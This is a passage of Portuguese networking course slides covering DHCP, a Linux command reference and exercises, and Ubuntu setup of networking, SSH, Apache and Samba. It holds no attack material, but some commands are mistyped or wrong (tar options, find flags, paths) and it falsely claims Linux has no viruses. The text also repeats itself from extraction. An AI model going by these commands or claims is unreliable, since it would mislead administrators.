Processo de Atribuição 1) O cliente envia a mensagem Dhcpdiscover em broadcast.1) O cliente envia a mensagem Dhcpdiscover em broadcast.

– O endereço IP de origem do pacote é 0.0.0.0 pois o cliente ainda não tem um endereço IP.

2) Quando o servidor recebe o pacote, ele seleciona um endereço IP disponível na sua lista e oferece ao cliente. – O servidor responde ao cliente com a mensagem

Dhcpoffer 3) Quando o cliente recebe a oferta ele pode:3) Quando o cliente recebe a oferta ele pode:

– aceitar enviando a mensagem Dhcprequest (incluindo o IP) em broadcast

– recusar enviando a mensagem Dhcpdecline em broadcast

4) Quando o servidor recebe o Dhcprequest ele pode:4) Quando o servidor recebe o Dhcprequest ele pode:– confirmar para o cliente com a mensagem Dhcpack– recusar, se o endereço foi usado por outro, com a

mensagem Dhcpnack 5) O cliente pode liberar um endereço com a mensagem

Dhcprelease.

Page 258: 62282591 Senai Curso Avancado Redes

Observações 1) O cliente aceita a primeira oferta que

receber. – Se houver mais de um servidor DHCP

distribuindo endereços IP, não haverá como selecionar apenas um deles.

2) O direito do cliente de usar o endereço IP recebido pelo servidor DHCP é temporário.– Quando o prazo de validade do IP expira, o

servidor pode atribuí-lo a outra estação na rede.

– O cliente pode liberá-lo antecipadamente com a mensagem Dhcprelease

Page 259: 62282591 Senai Curso Avancado Redes

Observações 3) Se o cliente não receber a oferta do

servidor:– Ele repete o pedido em intervalos de 2,

4, 8, 16 segundos.– Se as 4 tentativas fracassarem, ele tenta

novamente em intervalos de 5 minutos. 4) Quando o cliente é reinicializado, ele

tenta utilizar o mesmo IP que tinha anteriormente.– Ele envia o pacote Dhcprequest com o

endereço IP antigo ao invés do Dhcpdiscover.

– Se o pedido é negado, então o cliente envia um Dhcpdiscover.

Page 260: 62282591 Senai Curso Avancado Redes

Processo de Atribuição: Outras Vezes

Cliente DHCP

Servidor DHCP

Dhcprequest 200.17.98.1

Dhcpack 200.17.98.1

Todas as Todas as mensagens são mensagens são enviadas em enviadas em broadcastbroadcast

255.255.255.0200.17.98.2372 horas

200.17.98.1…200.17.98.254

ESCOPO

Dhcpnack

Dhcpdiscover

OU

Page 261: 62282591 Senai Curso Avancado Redes

Considerações sobre o Planejamento da Implementação do DHCP Para redes não segmentadas:

– Um único servidor DHCP pode atender até 10000 clientes (estimativa).

Para redes segmentadas:– Se os roteadores são compatíveis com a RFC1542

• Um único servidor DHCP é suficiente.

– Se os roteadores não são compatíveis com a RFC1542• Deve-se utilizar um servidor DHCP para cada rede.

Computadores que se ligam temporariamente na rede (notebooks, por exemplo) devem receber IPs com tempo de “leasing” curto.

Page 262: 62282591 Senai Curso Avancado Redes

Posicionando Servidores DHCP

Roteador RFC 1542compatível

Agente relay DHCP/BOOTP

Roteador não RFC 1542

compatível

Servidor DHCP 1

Servidor DHCP 2

Page 263: 62282591 Senai Curso Avancado Redes

Prática: DHCP

Instalar e configurar o DHCP; Criar Escopo Áreas de exclusões Definir arquivos por MAC ADDRESS

263

Page 264: 62282591 Senai Curso Avancado Redes

Prática : Instalação DHCP

264

Page 265: 62282591 Senai Curso Avancado Redes

Prática: Instalação de Serviços DNS Terminal Service Wins

265

Page 266: 62282591 Senai Curso Avancado Redes

Instalar Terminal Service

266

Page 267: 62282591 Senai Curso Avancado Redes

Prática : Instalando o IIS

Instalando e configurando Disponibilizando um site Configurando o DNS

267

Page 268: 62282591 Senai Curso Avancado Redes

Prática: IIS

268

Page 269: 62282591 Senai Curso Avancado Redes

Prática: IIS

269

Page 270: 62282591 Senai Curso Avancado Redes

Prática: Criação de Domínio Instalar e configurar o dominio; Criar usuários Compartilhamento de arquivos Definição de segurança com o GPO

270

Page 271: 62282591 Senai Curso Avancado Redes

Prática: Instalação DHCP

271

Page 272: 62282591 Senai Curso Avancado Redes

Prática: Criar Domínio Iniciar / Executar / dcpromo

272

Page 273: 62282591 Senai Curso Avancado Redes

Prática: Criar Domínio

273

Page 274: 62282591 Senai Curso Avancado Redes

Prática: Criar Domínio

274

Page 275: 62282591 Senai Curso Avancado Redes

LiNUX: Ubuntu

275

Page 276: 62282591 Senai Curso Avancado Redes

Instalação

276

Page 277: 62282591 Senai Curso Avancado Redes

Instalação (cont)

277

Page 278: 62282591 Senai Curso Avancado Redes

Estrutura dos diretóriosVamos conhece-los de acordo com a FHS (Filesystem Hierarchy

Standard):Todos os diretórios abaixo então dentro do diretório raiz, ou seja,

“/”. /bin : Arquivos e programas do sistema que são usados com

freqüência pelos usuários. /boot : Arquivos necessários para a inicialização do sistema. /cdrom : Ponto de montagem da unidade de CD-ROM. /dev : Arquivos usados para acessar dispositivos do computador. /etc : Arquivos de configuração do computador. /floppy : Ponto de montagem de unidade de disquetes /home : Diretório que contém os arquivos de cada usuário. /lib : Bibliotecas do sistema. /lost+found : Local de arquivos e/ou diretórios recuperados pelo

sistema.

278

Page 279: 62282591 Senai Curso Avancado Redes

Estrutura dos diretórios (cont) /mnt : Ponto de montagem temporário. /proc : Sistema de arquivos do Kernel. /root : Diretório do usuário root, o administrador do sistema. /opt : Local para aplicativos opcionais serem instalados. /media : Ponto de montagem de mídia removível, câmeras digitais,

pendrives /sbin : Diretório de programas usados pelo superusuário (root) para

administração e controle do funcionamento do sistema. /tmp : Arquivos temporários criados por programas. /usr : Diretório dos aplicativos. A maioria estará instalada neste diretório.

Curiosidade: usr não quer dizer “User” e sim “Unix System Resources”. /var : Diretório contém arquivos que são gravados com freqüência pelos

aplicativos do sistema, como: e-mails, cache, spool de impressora.Essa estrutura que mostrei acima, é considerada padrão. Encontrará a

mesma se estiver utilizando a distribuição da Red Hat, SuSe ou o Ubuntu.

279

Page 280: 62282591 Senai Curso Avancado Redes

Estrutura de dispositivosLinux DOS IRQ DMA I/O ttyS0 COM1 4 0x3F8 ttyS1 COM2 3 0x2F8 ttyS2 COM3 4 0x3E8 ttyS3 COM4 3 0x2E8 lp0 LPT1 7 3(ECP) 0x378 lp1 LPT2 5 3(ECP) 0x278 /dev/hda1 C: 14 0x1F0,0x3F6 /dev/hda2 D: * 14 0x1F0,0x3F6 /dev/hdb1 D: 15 0x170,0x376

280

Page 281: 62282591 Senai Curso Avancado Redes

Comandos Básicos Comparação DOS x Linux

281

DOS Linux Diferenças

cls clear Sem diferenças.

dir ls -la A listagem no Linux possui mais campos (aspermissões de acesso) e o total de espaço ocupado no diretório e livre no disco deve ser vistos separadamente usando o comando du e df. Permite também listar o conteúdo de diversos diretórios com um só comando (ls /bin /sbin /...).

cd cd Poucas diferenças. cd sem parâmetros retorna ao diretório de usuário e também permite o uso de "cd -" para retornar ao diretório anteriormente acessado.

del rm Poucas diferenças. O rm do Linux permite especificar diversos arquivos que serão apagados (rm arquivo1 arquivo2 arquivo3). Para ser mostrados os arquivos apagados, deve-se especificar oparâmetro "-v" ao comando, e "-i" para pedir a confirmação ao apagar arquivos.

md mkdir Uma só diferença: No Linux permite que vários diretórios sejam criados de uma só vez (mkdir /tmp/a /tmp/b...).

fdisk fdisk, cfdisk

Os particionadores do Linux trabalham com praticamente todos os tipos de partições de diversos sistemas de arquivos diferentes.

help man, info

Sem diferenças.

Page 282: 62282591 Senai Curso Avancado Redes

Comandos Básicos Comparação DOS x Linux

282

DOS Linux Diferenças

echo echo Sem diferenças.

copy cp Poucas diferenças. Para ser mostrados os arquivos enquanto estão sendo copiados, deve-se usar a opção "-v", e para que ele pergunte se deseja substituir um arquivo já existente, deve-se usar a opção "-i".

path path No Linux deve ser usado ":" para separar os diretórios e usar o comando "export PATH=caminho1:/caminho2:/caminho3:"para definir a variável de ambiente PATH. O path atual pode ser visualizado através do comando "echo $PATH".

ren mv Poucas diferenças. No Linux não é possível renomear vários arquivos de uma só vez (como "ren *.txt *.bak"). É necessário usar um shell script para fazer isto.

type cat Sem diferenças.

ver uname -a Poucas diferenças (o uname tem algumas opções a mais).

format mkfs.ext3 Poucas diferenças, precisa apenas que seja especificado o dispositivo a ser formatado como "/dev/fd0" ou "/dev/hda10" (otipo de identificação usada no Linux), ao invés de "A:" ou "C:".

mem cat /proc/meminfotop

Mostra detalhes sobre a quantidade de dados em buffers, cache e memória virtual (disco).

Page 283: 62282591 Senai Curso Avancado Redes

Comandos Básicos Comparação DOS x Linux

283

DOS Linux Diferenças

date date No Linux mostra/modifica a Data e Hora do sistema.

time date No Linux mostra/modifica a Data e Hora do sistema.

attrib chmod O chmod possui mais opções por tratar as permissões de acesso de leitura, gravação e execução para donos, grupos e outros usuários.

chkdsk fsck.ext3 O fsck é mais rápido e a checagem mais abrangente.

scandisk fsck.ext3 O fsck é mais rápido e a checagem mais abrangente.

doskey ----- A memorização de comandos é feita automaticamente pelo bash.

edit vi, ae, emacs, mcedit

O edit é mais fácil de usar, mas usuário experientes apreciarão os recursos do vi ou o emacs (programado em lisp)

interlnk plip O plip do Linux permite que sejam montadas redes reais a partir de uma conexão via Cabo Paralelo ou Serial. A máquina pode fazer tudo o que poderia fazer conectada em uma rede(na realidade é uma rede e usa o TCP/IP como protocolo) inclusive navegar na Internet, enviar e-mails, irc, etc.

intersvr plip Mesmo que o acima.

Page 284: 62282591 Senai Curso Avancado Redes

Comandos Básicos Comparação DOS x Linux

284

DOS Linux Diferenças

label e2label É necessário especificar a partição que terá

more more, less O more é equivalente a ambos os sistemas, mas o less permite que sejam usadas as setas para cima e para baixo, o que torna a leitura do texto muito mais agradável.

move mv Poucas diferenças. Para ser mostrados os arquivos enquanto estão sendo movidos, deve-se usar a opção "-v", e para que ele pergunte se deseja substituir um arquivo já existente deve-se usar a opção "-i".

scan ----- Não existem vírus no Linux devido as restrições do usuário durante execução de programas.

backup tar O tar permite o uso de compactação (através do parâmetro -z) e tem um melhor esquema de recuperação de arquivos corrompidos que já segue evoluindo há 30 anos em sistemas UNIX.

print lpr O lpr é mais rápido e permite até mesmo impressões de gráficos ou arquivos compactados diretamente caso seja usado o programa magicfilter. É o programa de Spool de impressoras usados no sistema Linux/Unix.

vol e2label Sem diferenças.

xcopy cp -R Pouca diferença, requer que seja usado a opção "-v" para mostrar os arquivos que estão sendo copiados e "-i" para pedirconfirmação de substituição de arquivos.

Page 285: 62282591 Senai Curso Avancado Redes

Comandos Básicos Verificar o Local onde está trabalhando => pwd

Criar diretório => mkdir <diretorio>mkdir <aula>

Chamar diretório => cdcd aula

Verificar o que existe no diretório => ls –la

Criar arquivos vazios => touchtouch arquivo1 Editar o arquivo => vi, mc, vi <arquivo> ou vi /<caminho>/arquivo

285

Page 286: 62282591 Senai Curso Avancado Redes

Comandos Básicos Alguns comandos do viinserir -> a,insertyy -> copiar (copiar n linhas usar n cc)dd -> apagar (apaga n linhas usar n dd)p -> colar/ -> procurarv -> desfaz a última alteração:x ou :wq -> salva e sai:q! -> sair sem salvar

Criar o texto abaixo (crie 2 arquivos fazios chamado http e telnet edite o texto abaixo):

### Permite acesso web (HTTP).$IPTABLES -A FORWARD -p tcp --dport 80 -j ACCEPT

### Permite acesso web (TELNET).$IPTABLES -A FORWARD -p tcp –dport 23 -j ACCEPT

286

Page 287: 62282591 Senai Curso Avancado Redes

Comandos Básicos Move arquivo => mv mv /<caminho_antigo>/<arquivo>

/<novo_caminho>/<arquivo>

Renomear arquivo=> mv mv /<caminho>/<arquivo atual> /<caminho>/<arquivo novo

>

Diferença entre 2 arquivos => diffdiff <arquivo1> <arquivo2>

Para melhor fixação faça o seguinte exercício:- Na sua pasta home, crie um diretório chamado aula e dentre

dele mais dois diretórios chamados http e ftp. - Move os arquivos criados anteriormente (http e ftp) para as

suas respectivas pastas- Renomeie os arquivos para new_http e new_ftp- Verifique a diferença entre os arquivos 287

Page 288: 62282591 Senai Curso Avancado Redes

Comandos Básicos verificar uma placa de rede => ifconfig

Verificar os usuários que estão logados ou em telnet => w

Compactar arquivosTar.gz => tar -cvfz <nm do arquivo>.tar.gz <diretório a ser compactado> Ex: tar -cvfz etc.tar.gz etc bz2 (melhor compactação)tar –cvjf <nmdoarquivo>.tar.bz2 /<caminhod do arquivo>EX: tar –cvjf ergon.tar.bz2 /mnt/temp

Para descompactar estes formatos de arquivos, os comandos são simples: zip: => gunzip nomedoarquivo rar: => rar x nomedoarquivo tar: => gzip nomedoarquivo tar.gz: => tar -vzxf nomedoarquivo tar.bz2: => tar -vxjpf nomedoarquivo

288

Page 289: 62282591 Senai Curso Avancado Redes

Comandos Básicos juntar dois arquivos => cat <arquivo final> <arquivo1> <arquivo2>

Dar permissão arquivos => chmodchmod <numero> <caminho/arquivo>

Verificação de Permissão (direito nos arquivos)d rwx r-x –wxd => diretório1 trinca => usuário proprietário2 trinca => grupo do usuário proprietário3 trinca => outros usuárior -> read (4) w-> write (2) x ->execute (1)rwx -> 4+2+1=7r-x -> 4+0+1=5rw- -> 4+2+0=6r-- -> 4+0+0=4

289

Page 290: 62282591 Senai Curso Avancado Redes

Comandos básicos Exercício de fixaçãoDentro do diretório aula crie um arquivo

apartir da junção dos arquivos http_new e ftp_new, cujo nome será firewall, sendo que este arquivo deverá ter as seguintes permisões:

Usuário proprietário = completoGrupo usuário proprietário = leitura e escritaOutros = leitura e execuçãoDepois faça a compactação da pasta aula

290

Page 291: 62282591 Senai Curso Avancado Redes

Comandos Básicos Verificar processos rodando na maquina => top ou ps –aux ou os -

aux |grep <processo>

Matar processos => kill -9 <pid processo>

Montar unidades (cdrom, pen driver, hd sata, ...) => mount$ sudo fdisk –l$ mount /dev/sda

Desmontar => unmountUnmount /dev/das

Exercício:Mountar e desmontar a unidade do cdrom.Abrir uma nova sessão (console) e matar o seu processo.

291

Page 292: 62282591 Senai Curso Avancado Redes

Comandos Básicos Respostassudo mount /dev/cdrom /cdromumount /cdrom ps –aux |grep consoleKill -9 <numero processo>

Localizar arquivos no computador => find ou locate$ find caminho expressões updatedb &locate <arquivo>Ex: Para localizar arquivos que foram acessados nos últimos 10 dias e os

arquivos cujo nome seja sysconfig $ find / -used 10 e $locate sysconfig

Exercício: Localizar todos os arquivos que possuam a palavra host e que estejam dentro da pasta /var

292

Updatedb ou find /var | grep hostLocate host | grep var

Page 293: 62282591 Senai Curso Avancado Redes

Comandos básicos verificar o espaço em disco => df –h verificar o que o diretório possue e o tamanho => du –h Verificar memória => free Verifica os espaços por partições => dh -f Verifica o tamanho dos arquivos e faz a soma do total no final

=>df -h –c Verificar o processador do servidor => cat /proc/cpuinfo reparar disco (*) => fsck -cy /dev/???

Exercício: Gostaria de saber quanto tenho de espaço de disco livre e quanto de espaço o meu diretório, a quantidade de memória total e livre, qual o meu processador, a quantidade de processos rodando nele e reparar o meu disco

293

$ df –h $ du -h /home/virtual $free$ top$ cat /proc/cpuinfo $ fsck –cv /dev/sda1

Page 294: 62282591 Senai Curso Avancado Redes

Localização de Arquivos Importantes serviços e resoluções de problemasdhcpd ==> /etc/rc.d/init.d/dhcpd restartsamba ==> /etc/rc.d/init.d/smb restartapache ==> /etc/rc.d/init.d/httpd restartsendmail ==> /etc/rc.d/init.d/sendmail restart

verificações de logsdhcpd ==> /var/log/mensagessamba ==> /var/log/samba/log.smb

log.nmb log.<nm do computador>apache ==> /var/log/httpd/access_logsendmail ==> /var/log/maillogprinter ==> /var/log/spooler

arquivos para serem backpeadosusuário ==> /etc/passwdgrupos ==> /etc/groupconf impressora ==> /etc/printcaptabela de IP ==> /etc/hostsdhcpd ==>

/etc/dhcpd.confsendmail ==> /etc/sendmail.cfsamba ==> /etc/smb.confsenhas do samba ==> /etc/smbpasswdapache ==>

/etc/httpd/conf/acess.conf /etc/httpd.conf

/etc/srm.conf

294

Page 295: 62282591 Senai Curso Avancado Redes

Comparação dos Programas do Windows x Linux

295

Windows Linux Diferenças

Microsoft Office

Open Office O Open Office possui todos os recursos do Word, excel e power point além de ter a interface gráfica igual, menuse teclas de atalho idênticas ao office, o que facilita a migração.Também trabalha com arquivos no formato office 97/2000 e não é vulnerável a vírus de macro.

MS Access MySQL, PostgreSQL Oracle

Existem diversas ferramentas de conceito para bancos de dados corporativos no Linux. Todos produtos compatíveis com outras plataformas.

MS Outlook Pine, icedove evolutionmutt sylpheed,

Centenas de programas de E-Mail tanto em modo texto como em modo gráfico. Instale, avalie e escolha.

MS Internet Explorer

Firefox, Opera, Mozilla, lynx.

Os três primeiros para modo gráfico e o lynx opera em modo texto.

ICQ LICQ, PIDGIM, SIM

Muito prático e fácil de operar. Possibilita a mudança completa da aparência do programa através de Skins. A organização dos menus deste programa é outro ponto de destaque.

MSN AMSN, PIDGIM

Permite conversar diretamente com usuários do Microsoft MSN.

Photo Shop The Gimp Fácil de usar, possui muitos scripts que permitem a criação rápida e fácil de qualquer tipo de efeito profissional pelo usuário mais leigo. Acompanha centenas de efeitos especiais e um belo manual em html com muitas fotos aproximadamente 20MB) que mostra o que é possível se fazer com ele.

Page 296: 62282591 Senai Curso Avancado Redes

Comparação dos Programas do Windows x Linux

296

Windows Linux Diferenças

Corel Photo Paint

GIMP Programa com funções genéricas

Corel Draw Inkscape, Sodipodi

Programas equivalentes

Autocad Qcad Programa com funções genéricas

Visio dia Possui funcionalidades identicas e ótimo conjunto de ícones

winamp xmms Possui todos os recursos do programa para Windows além de filtros que permite acrescentar efeitos digitais da música (em tempo real), eco, etc.

media player

mplayer, playmidixwave,

Programas para execução de arquivos de música e videos multimídia. Existem outras alternativas, a escolha depende de seu gosto e da sofisticação do programa.

Agente de Sistema

cron Pouca diferença. O cron da mais liberdade na programação de tarefas a serem executadas pelo Linux.

Bate-Papo talk, ytalk O talk e o ytalk permite a conversa de dois usuários não só através de uma rede local, mas de qualquer parte do planeta, pois usa o protocolo tcp/ip para comunicação. Muito útil e fácil de usar.

IIS, Pers. Web Server Apache

O apache é o servidor WEB mais usado no mundo (algo em torno de 75% das empresas), muito rápido e flexível de se configurar.

Exchange, NT Mail

Postfix, Sendmail Exim, Qmail

72% da base de servidores de emails no mundo atualmente roda em software livre. Os mais recomendados são o Postfix e o qmail, devido a segurança, velocidade e integridade de mensagem

Page 297: 62282591 Senai Curso Avancado Redes

Comparação dos Programas do Windows x Linux

297

Windows Linux Diferenças

Wingate, MS Proxy kerio

Squid, Apache Ip masquerade, nat, diald, exim,

,A migração de um servidor proxy para Linux requer o uso devários programas separados para que se tenha um resultadoprofissional. Isto pode parecer incomodo no começo, mas você logo perceberá que a divisão de serviços entre programas é mais produtivo. Quando desejar substituir um deles, o funcionamento dos outros não serão afetados. Não vou entrar em detalhes sobre os programas citados ao lado, mas o squid é um servidor proxy Web (HTTP e HTTPS) completo e também apresenta um excelente serviço FTP. Possui outros módulos como dns, ping, restrições de acesso, limites de tamanho de arquivos, cache, etc.

MS Frontpage

Mozilla e muitas outras ferramentas para a geração WEB (como zope, do site da distribuição Debianphp3, php4, wdm, htdig)

Sem comentários... todas sãoferramentas para de grandes Web Sites. O wdm,geração de conteúdo por exemplo, é usado na geração (http://www.debian.org) em 30 idiomas diferentes.

MS Winsock Sem equivalente O Linux tem suporte nativo a tcp/ip desde o começo de sua existência e não precisa de nenhuma camada de comunicação entre ele e a Internet. A performance é aproximadamente 10% maior em conexões Internet via fax-modem e outras redes tcp/ip.

AVG, Viruscan, Clamavis, AVG , F-PROT, CPAV.

AVG, Viruscan, Clamavis, AVG , F-PROT, CPAV

Os maiores fabricantes de anti-virus norton, F-Prot, ViruScan disponibilizam versões para Linux,com o objetivo principal de remoção de vírus em servidores de E-mail ou servidores de arquivos, com o objetivo de não contaminar os vulneráveis sistemas Windows, servindo como uma efetiva barreira de defesa na rede.

Page 298: 62282591 Senai Curso Avancado Redes

Comparação dos Programas do Windows x Linux

298

Windows Linux Diferenças

Wingate, MS Proxy kerio

Squid, Apache Ip masquerade, nat, diald, exim,

,A migração de um servidor proxy para Linux requer o uso devários programas separados para que se tenha um resultadoprofissional. Isto pode parecer incomodo no começo, mas você logo perceberá que a divisão de serviços entre programas é mais produtivo. Quando desejar substituir um deles, o funcionamento dos outros não serão afetados. Não vou entrar em detalhes sobre os programas citados ao lado, mas o squid é um servidor proxy Web (HTTP e HTTPS) completo e também apresenta um excelente serviço FTP. Possui outros módulos como dns, ping, restrições de acesso, limites de tamanho de arquivos, cache, etc.

MS Frontpage

Mozilla e muitas outras ferramentas para a geração WEB (como zope, do site da distribuição Debianphp3, php4, wdm, htdig)

Sem comentários... todas sãoferramentas para de grandes Web Sites. O wdm,geração de conteúdo por exemplo, é usado na geração (http://www.debian.org) em 30 idiomas diferentes.

MS Winsock Sem equivalente O Linux tem suporte nativo a tcp/ip desde o começo de sua existência e não precisa de nenhuma camada de comunicação entre ele e a Internet. A performance é aproximadamente 10% maior em conexões Internet via fax-modem e outras redes tcp/ip.

AVG, Viruscan, Clamavis, AVG , F-PROT, CPAV.

AVG, Viruscan, Clamavis, AVG , F-PROT, CPAV

Os maiores fabricantes de anti-virus norton, F-Prot, ViruScan disponibilizam versões para Linux,com o objetivo principal de remoção de vírus em servidores de E-mail ou servidores de arquivos, com o objetivo de não contaminar os vulneráveis sistemas Windows, servindo como uma efetiva barreira de defesa na rede.

Page 299: 62282591 Senai Curso Avancado Redes

Criação de Usuários sudo adduser <nome_user> sudo passwd <nome_user> cat /etc/passwd cat /etc/group

Exercício: Crie um usuário com o seu nome, e um grupo chamado aula. Associe o usuário ao grupo aula e depois ao grupo virtual

299

$sudo adduser <nome>$sudo addgroup aula$vi /etc/group$vi /etc/passwd

Page 300: 62282591 Senai Curso Avancado Redes

Configuração de rede 1. Descubra o modelo de sua placa de rede, digite:

# lspci

O resultado de ser algo como:

Ethernet controller: VIA Technologies, Inc. VT6105 [Rhine-III] (rev8b)

2. Agora veja em que eth o seu sistema identificou a placa, se for uma única placa de rede provavelmente eth0. Use o comando:

# cat /var/log/messages | egrep "eth"

O resultado dever ser:

Oct 20 11:18:55 fw2 kernel: eth0: VIA VT6105 Rhine-III at 0xec00, 00:xx:xx:xx:xx:xx, IRQ 5.

3. Beleza, sabendo que sua placa é uma VIA Rhine, carregue o módulo referente.

# vi /etc/modules

Coloque o seguinte: alias eth0 via-rhine.ko

300

Page 301: 62282591 Senai Curso Avancado Redes

Configuração de rede4. Vamos editar o arquivo que é verificado quando o serviço de rede é iniciado:

# vi /etc/network/interfaces

Coloque a seguinte linha neste arquivo para ip dinâmico: auto eth0 iface eth0 inet dhcp

ou o seguinte linhas para ip fixo: auto eth0

iface eth0 inet staticaddress 192.168.0.1network 192.168.254.254broadcast 192.168.0.255gateway 192.168.0.254

5. Para iniciar o serviço de rede execute o comando:

# invoke-rc.d network start

301

Page 302: 62282591 Senai Curso Avancado Redes

Configuração de rede

É só testar agora:

# ping 192.168.254.35PING 192.168.254.35 (192.168.254.35) 56(84) bytes of data.64 bytes from 192.168.254.35: icmp_seq=0 ttl=64 time=0.262 ms64 bytes from 192.168.254.35: icmp_seq=1 ttl=64 time=0.102 ms64 bytes from 192.168.254.35: icmp_seq=2 ttl=64 time=0.155 ms

6. Para confirmar se sua interface está ativa digite:

# ifconfig

Se estive ok deve mostrar: eth0 Encapsulamento do Link: Ethernet Endereço de HW 00:xx:xx:xx:xx:xx inet end.:

192.168.0.1 Bcast:192.168.0.255 Masc:255.255.255.0 UP BROADCASTRUNNING MULTICAST MTU:1500 Métrica:1 pacotes RX:13951137 erros:0 descart.:0 sobrepos.:0 quadro:0 pacotes TX:9849100 erros:0 descart.:0 sobrepos.:0 portadora:0 colisões:0 txqueuelen:1000 RX bytes:4069140904 (1.6 Mb) TX bytes:1802073588 (8.5 Mb) IRQ:10 Endereço de E/S:0xde00  7. Não esqueça de colocar o serviço para ser iniciado toda vez que ligar a máquina. Use o comando:

# update-rc.d -f network defaults

302

Page 303: 62282591 Senai Curso Avancado Redes

Configuração de serviços

Editar o arquivo souce.list- vi /etc/apt/souce.list

303

# Ubuntu supported packagesdeb http://us.archive.ubuntu.com/ubuntu hardy main restricteddeb-src http://us.archive.ubuntu.com/ubuntu hardy restricted main multiverse universedeb http://us.archive.ubuntu.com/ubuntu hardy-updates main restricteddeb-src http://us.archive.ubuntu.com/ubuntu hardy-updates restricted main multiverse universedeb http://security.ubuntu.com/ubuntu hardy-security main restricteddeb-src http://security.ubuntu.com/ubuntu hardy-security restricted main multiverse universe

# Ubuntu community supported packagesdeb http://us.archive.ubuntu.com/ubuntu hardy universe multiversedeb http://us.archive.ubuntu.com/ubuntu hardy-updates universe multiversedeb http://security.ubuntu.com/ubuntu hardy-security universe multiverse

# Ubuntu backports projectdeb http://us.archive.ubuntu.com/ubuntu hardy-backports main restricted universe multiversedeb-src http://us.archive.ubuntu.com/ubuntu hardy-backports main restricted universe multiverse

deb http://us.archive.ubuntu.com/ubuntu hardy-proposed restricted main multiverse universedeb-src http://us.archive.ubuntu.com/ubuntu hardy-proposed restricted main multiverse universe

Page 304: 62282591 Senai Curso Avancado Redes

Sources.list para a família Ubuntu Feisty Fawn

# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to

# newer versions of the distribution.

deb http://br.archive.ubuntu.com/ubuntu/ feisty main restricted

deb-src http://br.archive.ubuntu.com/ubuntu/ feisty main restricted

## Major bug fix updates produced after the final release of the

## distribution.

deb http://br.archive.ubuntu.com/ubuntu/ feisty-updates main restricted

deb-src http://br.archive.ubuntu.com/ubuntu/ feisty-updates main restricted

## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu

## team, and may not be under a free licence. Please satisfy yourself as to

## your rights to use the software. Also, please note that software in

## universe WILL NOT receive any review or updates from the Ubuntu security

## team.

deb http://br.archive.ubuntu.com/ubuntu/ feisty universe

deb-src http://br.archive.ubuntu.com/ubuntu/ feisty universe

## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu

## team, and may not be under a free licence. Please satisfy yourself as to

## your rights to use the software. Also, please note that software in

## multiverse WILL NOT receive any review or updates from the Ubuntu

## security team.

deb http://br.archive.ubuntu.com/ubuntu/ feisty multiverse

deb-src http://br.archive.ubuntu.com/ubuntu/ feisty multiverse

## Uncomment the following two lines to add software from the 'backports'

## repository.

## N.B. software from this repository may not have been tested as

## extensively as that contained in the main release, although it includes

## newer versions of some applications which may provide useful features.

## Also, please note that software in backports WILL NOT receive any review

## or updates from the Ubuntu security team.

deb http://br.archive.ubuntu.com/ubuntu/ feisty-backports main restricted universe multiverse

deb-src http://br.archive.ubuntu.com/ubuntu/ feisty-backports main restricted universe multiverse

deb http://security.ubuntu.com/ubuntu feisty-security main restricted

deb-src http://security.ubuntu.com/ubuntu feisty-security main restricted

deb http://security.ubuntu.com/ubuntu feisty-security universe

deb-src http://security.ubuntu.com/ubuntu feisty-security universe

deb http://security.ubuntu.com/ubuntu feisty-security multiverse

deb-src http://security.ubuntu.com/ubuntu feisty-security multiverse

304

Page 305: 62282591 Senai Curso Avancado Redes

Configuração de serviços

Apt-get update Apt-get upgrade Apt-get install <pacote ou

serviço>

305

Page 306: 62282591 Senai Curso Avancado Redes

Instalação do SSH

sudo apt-apt get update sudo apt-get install openssh-server vi /etc/ssh/sshd_config sudo /etc/init.d/ssh restart Putty free e winscp

306

Page 307: 62282591 Senai Curso Avancado Redes

Instalação do Apache sudo apt-get install apache2 Verificar o Local da pasta Base: sudo vi /etc/apache2/sites-available/default- Alterar o DocumentRoot de /var/www/ para

/var/www/site2/

Copiar o site do seu micro para a /var/www/ (colocar primeiro na sua pasta home e depois usar o comando

sudo cp –R /home/virtual/site2 /var/www/

307

Page 308: 62282591 Senai Curso Avancado Redes

Instalação do Apache Alterar o arquivo de procurar do nome inicial,

no nosso caso será acrescentar o index.htm, isto dentro do diretório /etc/apache2/httpd.conf

sudo i /etc/apache2/httpd.conf

<IfModule dir_module>

DirectoryIndex index2.htm index.html index.htm index.shtml index.php index.php5 index.php4 index.php3 index.phtml index.cgi

</IfModule>

308

Page 309: 62282591 Senai Curso Avancado Redes

Instalação do samba

apt-get install samba

Editar o arquivo /etc/samba/smb.conf

vi /etc/samba/smb.conf

Reinicializar o serviçosudo /ets/init.d/samba restart

309

Page 310: 62282591 Senai Curso Avancado Redes

[global]workgroup = AULAnetbios name = SRV-AULA# server string = %h server (Samba, Ubuntu)server string =#----------------------------------------------# kernel oplocks = nosocket options = TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=8192

SO_SNDB$#------------------------------------------------passdb backend = tdbsamsecurity = userusername map = /etc/samba/smbusersname resolve order = wins bcast hostsdomain logons = yespreferred master = yeswins support = yes

310

Page 311: 62282591 Senai Curso Avancado Redes

#============== Share Definitions ==================[printers] comment = All Printers browseable = nopath = /var/spool/sambaprintable = yesguest ok = noread only = yescreate mask = 0700#nome do compartilhamento[arquivos]comment = Pasta Publicapath = /arquivosvalid users = teste#force group = userscreate mask = 0660directory mask = 0771writable = yes

311

Page 312: 62282591 Senai Curso Avancado Redes

Configuração de Serviço (Gráfico)

312

Page 313: 62282591 Senai Curso Avancado Redes

Configuração de Serviço (Gráfico)

313

Page 314: 62282591 Senai Curso Avancado Redes

“Se você não pode proteger o que tem, você não tem nada.”

Anônimo

Page 315: 62282591 Senai Curso Avancado Redes

315

Fim do Curso.

Reflexão:“Os computadores são incrivelmente rápidos, precisos e burros; os

homens são incrivelmente lentos, imprecisos e brilhantes; juntos, seu poder ultrapassa os limites da Imaginação” – Albert Einstein

Dúvidas